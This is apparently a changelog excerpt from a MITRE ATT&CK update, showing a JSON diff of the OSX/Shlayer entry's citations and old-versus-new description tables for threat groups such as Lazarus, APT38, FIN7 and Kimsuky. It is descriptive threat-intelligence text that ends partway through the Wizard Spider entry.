"detailed_diff": "{\"dictionary_item_removed\": {\"root['external_references'][3]['url']\": \"https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-16 20:44:20.719000+00:00\", \"old_value\": \"2020-10-22 18:35:57.777000+00:00\"}, \"root['description']\": {\"new_value\": \"[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS that was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)\", \"old_value\": \"[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)\"}, \"root['external_references'][2]['source_name']\": {\"new_value\": \"Zshlayer\", \"old_value\": \"Crossrider\"}, \"root['external_references'][2]['description']\": {\"new_value\": \"(Citation: sentinelone shlayer to zshlayer)\", \"old_value\": \"(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)\"}, \"root['external_references'][3]['source_name']\": {\"new_value\": \"Crossrider\", \"old_value\": \"Carbon Black Shlayer Feb 2019\"}, \"root['external_references'][3]['description']\": {\"new_value\": \"(Citation: Intego Shlayer Apr 2018)(Citation: Malwarebytes Crossrider Apr 2018)\", \"old_value\": \"Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.\"}, \"root['external_references'][4]['source_name']\": {\"new_value\": \"Carbon Black Shlayer Feb 2019\", \"old_value\": \"Intego Shlayer Feb 2018\"}, \"root['external_references'][4]['description']\": {\"new_value\": \"Carbon Black Threat Analysis Unit. (2019, February 12). New macOS Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019.\", \"old_value\": \"Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.\"}, \"root['external_references'][4]['url']\": {\"new_value\": \"https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/\", \"old_value\": \"https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/\"}, \"root['external_references'][5]['source_name']\": {\"new_value\": \"Intego Shlayer Feb 2018\", \"old_value\": \"Intego Shlayer Apr 2018\"}, \"root['external_references'][5]['description']\": {\"new_value\": \"Long, Joshua. (2018, February 21). OSX/Shlayer: New Mac malware comes out of its shell. Retrieved August 28, 2019.\", \"old_value\": \"Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.\"}, \"root['external_references'][5]['url']\": {\"new_value\": \"https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/\", \"old_value\": \"https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/\"}, \"root['external_references'][6]['source_name']\": {\"new_value\": \"sentinelone shlayer to zshlayer\", \"old_value\": \"Malwarebytes Crossrider Apr 2018\"}, \"root['external_references'][6]['description']\": {\"new_value\": \"Phil Stokes. (2020, September 8). Coming Out of Your Shell: From Shlayer to ZShlayer. Retrieved September 13, 2021.\", \"old_value\": \"Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.\"}, \"root['external_references'][6]['url']\": {\"new_value\": \"https://www.sentinelone.com/blog/coming-out-of-your-shell-from-shlayer-to-zshlayer/\", \"old_value\": \"https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}, \"iterable_item_added\": {\"root['external_references'][7]\": {\"source_name\": \"Intego Shlayer Apr 2018\", \"description\": \"Vrijenhoek, Jay. (2018, April 24). New OSX/Shlayer Malware Variant Found Using a Dirty New Trick. Retrieved September 6, 2019.\", \"url\": \"https://www.intego.com/mac-security-blog/new-osxshlayer-malware-variant-found-using-a-dirty-new-trick/\"}, \"root['external_references'][8]\": {\"source_name\": \"Malwarebytes Crossrider Apr 2018\", \"description\": \"Reed, Thomas. (2018, April 24). New Crossrider variant installs configuration profiles on Macs. Retrieved September 6, 2019.\", \"url\": \"https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/\"}, \"root['x_mitre_aliases'][1]\": \"Zshlayer\"}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [OSX/Shlayer](https://attack.mitre.org/software/S0402) is a | t | 1 | [OSX/Shlayer](https://attack.mitre.org/software/S0402) is a |
| > | Trojan designed to install adware on macOS. It was first dis | > | Trojan designed to install adware on macOS that was first di | ||
| > | covered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Ci | > | scovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(C | ||
| > | tation: Intego Shlayer Feb 2018) | > | itation: Intego Shlayer Feb 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593 | t | 1 | [ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593 |
| > | ) is a Remote Access Tool (RAT) used by [Lazarus Group](http | > | ) is a remote access Trojan (RAT) used by North Korean cyber | ||
| > | s://attack.mitre.org/groups/G0032) that was first identified | > | actors that was first identified in August 2020. It is a re | ||
| > | in August 2020. It is a reconnaissance tool--with keyloggin | > | connaissance tool--with keylogging and screen capture functi | ||
| > | g and screen capture functionality--used for information gat | > | onality--used for information gathering on compromised syste | ||
| > | hering on compromised systems.(Citation: CISA EB Aug 2020) | > | ms.(Citation: CISA EB Aug 2020) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT37](https://attack.mitre.org/groups/G0067) is a suspecte | t | 1 | [APT37](https://attack.mitre.org/groups/G0067) is a North Ko |
| > | d North Korean cyber espionage group that has been active si | > | rean state-sponsored cyber espionage group that has been act | ||
| > | nce at least 2012. The group has targeted victims primarily | > | ive since at least 2012. The group has targeted victims prim | ||
| > | in South Korea, but also in Japan, Vietnam, Russia, Nepal, C | > | arily in South Korea, but also in Japan, Vietnam, Russia, Ne | ||
| > | hina, India, Romania, Kuwait, and other parts of the Middle | > | pal, China, India, Romania, Kuwait, and other parts of the M | ||
| > | East. [APT37](https://attack.mitre.org/groups/G0067) has als | > | iddle East. [APT37](https://attack.mitre.org/groups/G0067) h | ||
| > | o been linked to following campaigns between 2016-2018: Oper | > | as also been linked to the following campaigns between 2016- | ||
| > | ation Daybreak, Operation Erebus, Golden Time, Evil New Year | > | 2018: Operation Daybreak, Operation Erebus, Golden Time, Evi | ||
| > | , Are you Happy?, FreeMilk, Northern Korean Human Rights, an | > | l New Year, Are you Happy?, FreeMilk, North Korean Human Rig | ||
| > | d Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Ci | > | hts, and Evil New Year 2018.(Citation: FireEye APT37 Feb 201 | ||
| > | tation: Securelist ScarCruft Jun 2016) (Citation: Talos Grou | > | 8)(Citation: Securelist ScarCruft Jun 2016)(Citation: Talos | ||
| > | p123) North Korean group definitions are known to have sign | > | Group123) North Korean group definitions are known to have | ||
| > | ificant overlap, and the name [Lazarus Group](https://attack | > | significant overlap, and some security researchers report al | ||
| > | .mitre.org/groups/G0032) is known to encompass a broad range | > | l North Korean state-sponsored cyber activity under the name | ||
| > | of activity. Some organizations use the name Lazarus Group | > | [Lazarus Group](https://attack.mitre.org/groups/G0032) inst | ||
| > | to refer to any activity attributed to North Korea.(Citation | > | ead of tracking clusters or subgroups. | ||
| > | : US-CERT HIDDEN COBRA June 2017) Some organizations track N | ||||
| > | orth Korean clusters or groups such as Bluenoroff,(Citation: | ||||
| > | Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https:/ | ||||
| > | /attack.mitre.org/groups/G0067), and [APT38](https://attack. | ||||
| > | mitre.org/groups/G0082) separately, while other organization | ||||
| > | s may track some activity associated with those group names | ||||
| > | by the name Lazarus Group. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT38](https://attack.mitre.org/groups/G0082) is a financia | t | 1 | [APT38](https://attack.mitre.org/groups/G0082) is a North Ko |
| > | lly-motivated threat group that is backed by the North Korea | > | rean state-sponsored threat group that specializes in financ | ||
| > | n regime. The group mainly targets banks and financial insti | > | ial cyber operations; it has been attributed to the Reconnai | ||
| > | tutions and has targeted more than 16 organizations in at le | > | ssance General Bureau.(Citation: CISA AA20-239A BeagleBoyz A | ||
| > | ast 13 countries since at least 2014.(Citation: FireEye APT3 | > | ugust 2020) Active since at least 2014, [APT38](https://atta | ||
| > | 8 Oct 2018) North Korean group definitions are known to hav | > | ck.mitre.org/groups/G0082) has targeted banks, financial ins | ||
| > | e significant overlap, and the name [Lazarus Group](https:// | > | titutions, casinos, cryptocurrency exchanges, SWIFT system e | ||
| > | attack.mitre.org/groups/G0032) is known to encompass a broad | > | ndpoints, and ATMs in at least 38 countries worldwide. Signi | ||
| > | range of activity. Some organizations use the name Lazarus | > | ficant operations include the 2016 Bank of Bangladesh heist, | ||
| > | Group to refer to any activity attributed to North Korea.(Ci | > | during which [APT38](https://attack.mitre.org/groups/G0082) | ||
| > | tation: US-CERT HIDDEN COBRA June 2017) Some organizations t | > | stole $81 million, as well as attacks against Bancomext (20 | ||
| > | rack North Korean clusters or groups such as Bluenoroff,(Cit | > | 18) and Banco de Chile (2018); some of their attacks have be | ||
| > | ation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](h | > | en destructive.(Citation: CISA AA20-239A BeagleBoyz August 2 | ||
| > | ttps://attack.mitre.org/groups/G0067), and [APT38](https://a | > | 020)(Citation: FireEye APT38 Oct 2018)(Citation: DOJ North K | ||
| > | ttack.mitre.org/groups/G0082) separately, while other organi | > | orea Indictment Feb 2021)(Citation: Kaspersky Lazarus Under | ||
| > | zations may track some activity associated with those group | > | The Hood Blog 2017) North Korean group definitions are know | ||
| > | names by the name Lazarus Group. | > | n to have significant overlap, and some security researchers | ||
| > | report all North Korean state-sponsored cyber activity unde | ||||
| > | r the name [Lazarus Group](https://attack.mitre.org/groups/G | ||||
| > | 0032) instead of tracking clusters or subgroups. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [APT41](https://attack.mitre.org/groups/G0096) is a threat g | t | 1 | [APT41](https://attack.mitre.org/groups/G0096) is a threat g |
| > | roup that researchers have assessed as Chinese state-sponsor | > | roup that researchers have assessed as Chinese state-sponsor | ||
| > | ed espionage group that also conducts financially-motivated | > | ed espionage group that also conducts financially-motivated | ||
| > | operations. [APT41](https://attack.mitre.org/groups/G0096) h | > | operations. Active since at least 2012, [APT41](https://atta | ||
| > | as been active since as early as 2012. The group has been ob | > | ck.mitre.org/groups/G0096) has been observed targeting healt | ||
| > | served targeting healthcare, telecom, technology, and video | > | hcare, telecom, technology, and video game industries in 14 | ||
| > | game industries in 14 countries.(Citation: FireEye APT41 Aug | > | countries. [APT41](https://attack.mitre.org/groups/G0096) ov | ||
| > | 2019) | > | erlaps at least partially with public reporting on groups in | ||
| > | cluding BARIUM and [Winnti Group](https://attack.mitre.org/g | ||||
| > | roups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Gr | ||||
| > | oup IB APT 41 June 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Carbanak](https://attack.mitre.org/groups/G0008) is a threa | t | 1 | [Carbanak](https://attack.mitre.org/groups/G0008) is a cyber |
| > | t group that mainly targets banks. It also refers to malware | > | criminal group that has used [Carbanak](https://attack.mitre | ||
| > | of the same name ([Carbanak](https://attack.mitre.org/softw | > | .org/software/S0030) malware to target financial institution | ||
| > | are/S0030)). It is sometimes referred to as [FIN7](https://a | > | s since at least 2013. [Carbanak](https://attack.mitre.org/g | ||
| > | ttack.mitre.org/groups/G0046), but these appear to be two gr | > | roups/G0008) may be linked to groups tracked separately as [ | ||
| > | oups using the same [Carbanak](https://attack.mitre.org/soft | > | Cobalt Group](https://attack.mitre.org/groups/G0080) and [FI | ||
| > | ware/S0030) malware and are therefore tracked separately. (C | > | N7](https://attack.mitre.org/groups/G0046) that have also us | ||
| > | itation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2 | > | ed [Carbanak](https://attack.mitre.org/software/S0030) malwa | ||
| > | 017) | > | re.(Citation: Kaspersky Carbanak)(Citation: FireEye FIN7 Apr | ||
| > | il 2017)(Citation: Europol Cobalt Mar 2018)(Citation: Secure | ||||
| > | works GOLD NIAGARA Threat Profile)(Citation: Secureworks GOL | ||||
| > | D KINGSWOOD Threat Profile) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Cobalt Group](https://attack.mitre.org/groups/G0080) is a f | t | 1 | [Cobalt Group](https://attack.mitre.org/groups/G0080) is a f |
| > | inancially motivated threat group that has primarily targete | > | inancially motivated threat group that has primarily targete | ||
| > | d financial institutions. The group has conducted intrusions | > | d financial institutions since at least 2016. The group has | ||
| > | to steal money via targeting ATM systems, card processing, | > | conducted intrusions to steal money via targeting ATM system | ||
| > | payment systems and SWIFT systems. [Cobalt Group](https://at | > | s, card processing, payment systems and SWIFT systems. [Coba | ||
| > | tack.mitre.org/groups/G0080) has mainly targeted banks in Ea | > | lt Group](https://attack.mitre.org/groups/G0080) has mainly | ||
| > | stern Europe, Central Asia, and Southeast Asia. One of the a | > | targeted banks in Eastern Europe, Central Asia, and Southeas | ||
| > | lleged leaders was arrested in Spain in early 2018, but the | > | t Asia. One of the alleged leaders was arrested in Spain in | ||
| > | group still appears to be active. The group has been known t | > | early 2018, but the group still appears to be active. The gr | ||
| > | o target organizations in order to use their access to then | > | oup has been known to target organizations in order to use t | ||
| > | compromise additional victims. (Citation: Talos Cobalt Group | > | heir access to then compromise additional victims.(Citation: | ||
| > | July 2018) (Citation: PTSecurity Cobalt Group Aug 2017) (Ci | > | Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt G | ||
| > | tation: PTSecurity Cobalt Dec 2016) (Citation: Group IB Coba | > | roup Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citatio | ||
| > | lt Aug 2017) (Citation: Proofpoint Cobalt June 2017) (Citati | > | n: Group IB Cobalt Aug 2017)(Citation: Proofpoint Cobalt Jun | ||
| > | on: RiskIQ Cobalt Nov 2017) (Citation: RiskIQ Cobalt Jan 201 | > | e 2017)(Citation: RiskIQ Cobalt Nov 2017)(Citation: RiskIQ C | ||
| > | 8) Reporting indicates there may be links between [Cobalt Gr | > | obalt Jan 2018) Reporting indicates there may be links betwe | ||
| > | oup](https://attack.mitre.org/groups/G0080) and both the mal | > | en [Cobalt Group](https://attack.mitre.org/groups/G0080) and | ||
| > | ware [Carbanak](https://attack.mitre.org/software/S0030) and | > | both the malware [Carbanak](https://attack.mitre.org/softwa | ||
| > | the group [Carbanak](https://attack.mitre.org/groups/G0008) | > | re/S0030) and the group [Carbanak](https://attack.mitre.org/ | ||
| > | . (Citation: Europol Cobalt Mar 2018) | > | groups/G0008).(Citation: Europol Cobalt Mar 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [FIN7](https://attack.mitre.org/groups/G0046) is a financial | t | 1 | [FIN7](https://attack.mitre.org/groups/G0046) is a financial |
| > | ly-motivated threat group that has primarily targeted the U. | > | ly-motivated threat group that has been active since 2013 pr | ||
| > | S. retail, restaurant, and hospitality sectors since mid-201 | > | imarily targeting the U.S. retail, restaurant, and hospitali | ||
| > | 5. They often use point-of-sale malware. A portion of [FIN7] | > | ty sectors, often using point-of-sale malware. A portion of | ||
| > | (https://attack.mitre.org/groups/G0046) was run out of a fro | > | [FIN7](https://attack.mitre.org/groups/G0046) was run out of | ||
| > | nt company called Combi Security. [FIN7](https://attack.mitr | > | a front company called Combi Security. Since 2020 [FIN7](ht | ||
| > | e.org/groups/G0046) is sometimes referred to as [Carbanak](h | > | tps://attack.mitre.org/groups/G0046) shifted operations to a | ||
| > | ttps://attack.mitre.org/groups/G0008) Group, but these appea | > | big game hunting (BGH) approach including use of [REvil](ht | ||
| > | r to be two groups using the same [Carbanak](https://attack. | > | tps://attack.mitre.org/software/S0496) ransomware and their | ||
| > | mitre.org/software/S0030) malware and are therefore tracked | > | own Ransomware as a Service (RaaS), Darkside. [FIN7](https:/ | ||
| > | separately. (Citation: FireEye FIN7 March 2017) (Citation: F | > | /attack.mitre.org/groups/G0046) may be linked to the [Carban | ||
| > | ireEye FIN7 April 2017) (Citation: FireEye CARBANAK June 201 | > | ak](https://attack.mitre.org/groups/G0008) Group, but there | ||
| > | 7) (Citation: FireEye FIN7 Aug 2018) | > | appears to be several groups using [Carbanak](https://attack | ||
| > | .mitre.org/software/S0030) malware and are therefore tracked | ||||
| > | separately.(Citation: FireEye FIN7 March 2017)(Citation: Fi | ||||
| > | reEye FIN7 April 2017)(Citation: FireEye CARBANAK June 2017) | ||||
| > | (Citation: FireEye FIN7 Aug 2018)(Citation: CrowdStrike Carb | ||||
| > | on Spider August 2021) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a | t | 1 | [Indrik Spider](https://attack.mitre.org/groups/G0119) is a |
| > | financially motivated threat group that has leveraged the Dr | > | Russia-based cybercriminal group that as been active since a | ||
| > | idex banking trojan since at least June 2014 and delivered r | > | t least 2014. [Indrik Spider](https://attack.mitre.org/group | ||
| > | ansomware variants since 2017.(Citation: Crowdstrike Indrik | > | s/G0119) initially started with the [Dridex](https://attack. | ||
| > | November 2018) | > | mitre.org/software/S0384) banking Trojan, and then by 2017 t | ||
| > | hey began running ransomware operations using [BitPaymer](ht | ||||
| > | tps://attack.mitre.org/software/S0570), [WastedLocker](https | ||||
| > | ://attack.mitre.org/software/S0612), and Hades ransomware.(C | ||||
| > | itation: Crowdstrike Indrik November 2018)(Citation: Crowdst | ||||
| > | rike EvilCorp March 2021)(Citation: Treasury EvilCorp Dec 20 | ||||
| > | 19) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North | t | 1 | [Kimsuky](https://attack.mitre.org/groups/G0094) is a North |
| > | Korean-based threat group that has been active since at leas | > | Korea-based cyber espionage group that has been active since | ||
| > | t September 2013. The group initially focused on targeting K | > | at least 2012. The group initially focused on targeting Sou | ||
| > | orean think tanks and DPRK/nuclear-related targets, expandin | > | th Korean government entities, think tanks, and individuals | ||
| > | g recently to the United States, Russia, and Europe. The gro | > | identified as experts in various fields, and expanded its op | ||
| > | up was attributed as the actor behind the Korea Hydro & Nucl | > | erations to include the United States, Russia, Europe, and t | ||
| > | ear Power Co. compromise.(Citation: EST Kimsuky April 2019)( | > | he UN. [Kimsuky](https://attack.mitre.org/groups/G0094) has | ||
| > | Citation: BRI Kimsuky April 2019)(Citation: Cybereason Kimsu | > | focused its intelligence collection activities on foreign po | ||
| > | ky November 2020) | > | licy and national security issues related to the Korean peni | ||
| > | nsula, nuclear policy, and sanctions.(Citation: EST Kimsuky | ||||
| > | April 2019)(Citation: BRI Kimsuky April 2019)(Citation: Cybe | ||||
| > | reason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky | ||||
| > | June 2021)(Citation: CISA AA20-301A Kimsuky) [Kimsuky](htt | ||||
| > | ps://attack.mitre.org/groups/G0094) was assessed to be respo | ||||
| > | nsible for the 2014 Korea Hydro & Nuclear Power Co. compromi | ||||
| > | se; other notable campaigns include Operation STOLEN PENCIL | ||||
| > | (2018), Operation Kabar Cobra (2019), and Operation Smoke Sc | ||||
| > | reen (2019).(Citation: Netscout Stolen Pencil Dec 2018)(Cita | ||||
| > | tion: EST Kimsuky SmokeScreen April 2019)(Citation: AhnLab K | ||||
| > | imsuky Kabar Cobra Feb 2019) North Korean group definitions | ||||
| > | are known to have significant overlap, and some security re | ||||
| > | searchers report all North Korean state-sponsored cyber acti | ||||
| > | vity under the name [Lazarus Group](https://attack.mitre.org | ||||
| > | /groups/G0032) instead of tracking clusters or subgroups. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a | t | 1 | [Lazarus Group](https://attack.mitre.org/groups/G0032) is a |
| > | threat group that has been attributed to the North Korean go | > | North Korean state-sponsored cyber threat group that has bee | ||
| > | vernment.(Citation: US-CERT HIDDEN COBRA June 2017) The grou | > | n attributed to the Reconnaissance General Bureau.(Citation: | ||
| > | p has been active since at least 2009 and was reportedly res | > | US-CERT HIDDEN COBRA June 2017)(Citation: Treasury North Ko | ||
| > | ponsible for the November 2014 destructive wiper attack agai | > | rean Cyber Groups September 2019) The group has been active | ||
| > | nst Sony Pictures Entertainment as part of a campaign named | > | since at least 2009 and was reportedly responsible for the N | ||
| > | Operation Blockbuster by Novetta. Malware used by [Lazarus G | > | ovember 2014 destructive wiper attack against Sony Pictures | ||
| > | roup](https://attack.mitre.org/groups/G0032) correlates to o | > | Entertainment as part of a campaign named Operation Blockbus | ||
| > | ther reported campaigns, including Operation Flame, Operatio | > | ter by Novetta. Malware used by [Lazarus Group](https://atta | ||
| > | n 1Mission, Operation Troy, DarkSeoul, and Ten Days of Rain. | > | ck.mitre.org/groups/G0032) correlates to other reported camp | ||
| > | (Citation: Novetta Blockbuster) In late 2017, [Lazarus Grou | > | aigns, including Operation Flame, Operation 1Mission, Operat | ||
| > | p](https://attack.mitre.org/groups/G0032) used KillDisk, a d | > | ion Troy, DarkSeoul, and Ten Days of Rain. (Citation: Novett | ||
| > | isk-wiping tool, in an attack against an online casino based | > | a Blockbuster) North Korean group definitions are known to | ||
| > | in Central America. (Citation: Lazarus KillDisk) North Kor | > | have significant overlap, and some security researchers repo | ||
| > | ean group definitions are known to have significant overlap, | > | rt all North Korean state-sponsored cyber activity under the | ||
| > | and the name [Lazarus Group](https://attack.mitre.org/group | > | name [Lazarus Group](https://attack.mitre.org/groups/G0032) | ||
| > | s/G0032) is known to encompass a broad range of activity. So | > | instead of tracking clusters or subgroups, such as [Andarie | ||
| > | me organizations use the name Lazarus Group to refer to any | > | l](https://attack.mitre.org/groups/G0138), [APT37](https://a | ||
| > | activity attributed to North Korea.(Citation: US-CERT HIDDEN | > | ttack.mitre.org/groups/G0067), [APT38](https://attack.mitre. | ||
| > | COBRA June 2017) Some organizations track North Korean clus | > | org/groups/G0082), and [Kimsuky](https://attack.mitre.org/gr | ||
| > | ters or groups such as Bluenoroff,(Citation: Kaspersky Lazar | > | oups/G0094). | ||
| > | us Under The Hood Blog 2017) [APT37](https://attack.mitre.or | ||||
| > | g/groups/G0067), and [APT38](https://attack.mitre.org/groups | ||||
| > | /G0082) separately, while other organizations may track some | ||||
| > | activity associated with those group names by the name Laza | ||||
| > | rus Group. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Leviathan](https://attack.mitre.org/groups/G0065) is a cybe | t | 1 | [Leviathan](https://attack.mitre.org/groups/G0065) is a Chin |
| > | r espionage group that has been active since at least 2013. | > | ese state-sponsored cyber espionage group that has been attr | ||
| > | The group generally targets defense and government organizat | > | ibuted to the Ministry of State Security's (MSS) Hainan Stat | ||
| > | ions, but has also targeted a range of industries including | > | e Security Department and an affiliated front company.(Citat | ||
| > | engineering firms, shipping and transportation, manufacturin | > | ion: CISA AA21-200A APT40 July 2021) Active since at least 2 | ||
| > | g, defense, government offices, and research universities in | > | 009, [Leviathan](https://attack.mitre.org/groups/G0065) has | ||
| > | the United States, Western Europe, and along the South Chin | > | targeted the following sectors: academia, aerospace/aviation | ||
| > | a Sea. (Citation: Proofpoint Leviathan Oct 2017) (Citation: | > | , biomedical, defense industrial base, government, healthcar | ||
| > | FireEye Periscope March 2018) | > | e, manufacturing, maritime, and transportation across the US | ||
| > | , Canada, Europe, the Middle East, and Southeast Asia.(Citat | ||||
| > | ion: CISA AA21-200A APT40 July 2021)(Citation: Proofpoint Le | ||||
| > | viathan Oct 2017)(Citation: FireEye Periscope March 2018) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Magic Hound](https://attack.mitre.org/groups/G0059) is an I | t | 1 | [Magic Hound](https://attack.mitre.org/groups/G0059) is an I |
| > | ranian-sponsored threat group that conducts long term, resou | > | ranian-sponsored threat group that conducts long term, resou | ||
| > | rce-intensive cyber espionage operations, dating back as ear | > | rce-intensive cyber espionage operations, likely on behalf o | ||
| > | ly as 2014. The group typically targets U.S. and Middle East | > | f the Islamic Revolutionary Guard Corps. They have targeted | ||
| > | ern military organizations, as well as other government pers | > | U.S. and Middle Eastern government and military personnel, a | ||
| > | onnel, via complex social engineering campaigns.(Citation: F | > | cademics, journalists, and organizations such as the World H | ||
| > | ireEye APT35 2018) | > | ealth Organization (WHO), via complex social engineering cam | ||
| > | paigns since at least 2014.(Citation: FireEye APT35 2018)(Ci | ||||
| > | tation: ClearSky Kittens Back 3 August 2020)(Citation: Certf | ||||
| > | a Charming Kitten January 2021)(Citation: Secureworks COBALT | ||||
| > | ILLUSION Threat Profile)(Citation: Proofpoint TA453 July202 | ||||
| > | 1) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Naikon](https://attack.mitre.org/groups/G0019) is a threat | t | 1 | [Naikon](https://attack.mitre.org/groups/G0019) is assessed |
| > | group that has focused on targets around the South China Sea | > | to be a state-sponsored cyber espionage group attributed to | ||
| > | .(Citation: Baumgartner Naikon 2015) The group has been attr | > | the Chinese People\u2019s Liberation Army\u2019s (PLA) Chengdu Militar | ||
| > | ibuted to the Chinese People\u2019s Liberation Army\u2019s (PLA) Cheng | > | y Region Second Technical Reconnaissance Bureau (Military Un | ||
| > | du Military Region Second Technical Reconnaissance Bureau(Mi | > | it Cover Designator 78020).(Citation: CameraShy) Active sinc | ||
| > | litary Unit Cover Designator 78020).(Citation: CameraShy) Wh | > | e at least 2010, [Naikon](https://attack.mitre.org/groups/G0 | ||
| > | ile [Naikon](https://attack.mitre.org/groups/G0019) shares s | > | 019) has primarily conducted operations against government, | ||
| > | ome characteristics with [APT30](https://attack.mitre.org/gr | > | military, and civil organizations in Southeast Asia, as well | ||
| > | oups/G0013), the two groups do not appear to be exact matche | > | as against international bodies such as the United Nations | ||
| > | s.(Citation: Baumgartner Golovkin Naikon 2015) | > | Development Programme (UNDP) and the Association of Southeas | ||
| > | t Asian Nations (ASEAN).(Citation: CameraShy)(Citation: Baum | ||||
| > | gartner Naikon 2015) While [Naikon](https://attack.mitre.o | ||||
| > | rg/groups/G0019) shares some characteristics with [APT30](ht | ||||
| > | tps://attack.mitre.org/groups/G0013), the two groups do not | ||||
| > | appear to be exact matches.(Citation: Baumgartner Golovkin N | ||||
| > | aikon 2015) |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [OilRig](https://attack.mitre.org/groups/G0049) is a suspect | t | 1 | [OilRig](https://attack.mitre.org/groups/G0049) is a suspect |
| > | ed Iranian threat group that has targeted Middle Eastern and | > | ed Iranian threat group that has targeted Middle Eastern and | ||
| > | international victims since at least 2014. The group has ta | > | international victims since at least 2014. The group has ta | ||
| > | rgeted a variety of industries, including financial, governm | > | rgeted a variety of sectors, including financial, government | ||
| > | ent, energy, chemical, and telecommunications, and has large | > | , energy, chemical, and telecommunications. It appears the g | ||
| > | ly focused its operations within the Middle East. It appears | > | roup carries out supply chain attacks, leveraging the trust | ||
| > | the group carries out supply chain attacks, leveraging the | > | relationship between organizations to attack their primary t | ||
| > | trust relationship between organizations to attack their pri | > | argets. FireEye assesses that the group works on behalf of t | ||
| > | mary targets. FireEye assesses that the group works on behal | > | he Iranian government based on infrastructure details that c | ||
| > | f of the Iranian government based on infrastructure details | > | ontain references to Iran, use of Iranian infrastructure, an | ||
| > | that contain references to Iran, use of Iranian infrastructu | > | d targeting that aligns with nation-state interests. (Citati | ||
| > | re, and targeting that aligns with nation-state interests. ( | > | on: Palo Alto OilRig April 2017) (Citation: ClearSky OilRig | ||
| > | Citation: Palo Alto OilRig April 2017) (Citation: ClearSky O | > | Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citation: P | ||
| > | ilRig Jan 2017) (Citation: Palo Alto OilRig May 2016) (Citat | > | alo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook Dec 20 | ||
| > | ion: Palo Alto OilRig Oct 2016) (Citation: Unit 42 Playbook | > | 17) (Citation: FireEye APT34 Dec 2017)(Citation: Unit 42 QUA | ||
| > | Dec 2017) (Citation: FireEye APT34 Dec 2017)(Citation: Unit | > | DAGENT July 2018) | ||
| > | 42 QUADAGENT July 2018) This group was previously tracked un | ||||
| > | der two distinct groups, APT34 and OilRig, but was combined | ||||
| > | due to additional reporting giving higher confidence about t | ||||
| > | he overlap of the activity. |
| Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a | t | 1 | [Wizard Spider](https://attack.mitre.org/groups/G0102) is a |
| > | financially motivated criminal group that has been conductin | > | Russia-based financially motivated threat group originally k | ||
| > | g ransomware campaigns since at least August 2018 against a | > | nown for the creation and deployment of [TrickBot](https://a | ||
| > | variety of organizations, ranging from major corporations to | > | ttack.mitre.org/software/S0266) since at least 2016. [Wizard | ||
| > | hospitals.(Citation: CrowdStrike Ryuk January 2019)(Citatio | > | Spider](https://attack.mitre.org/groups/G0102) possesses a | ||
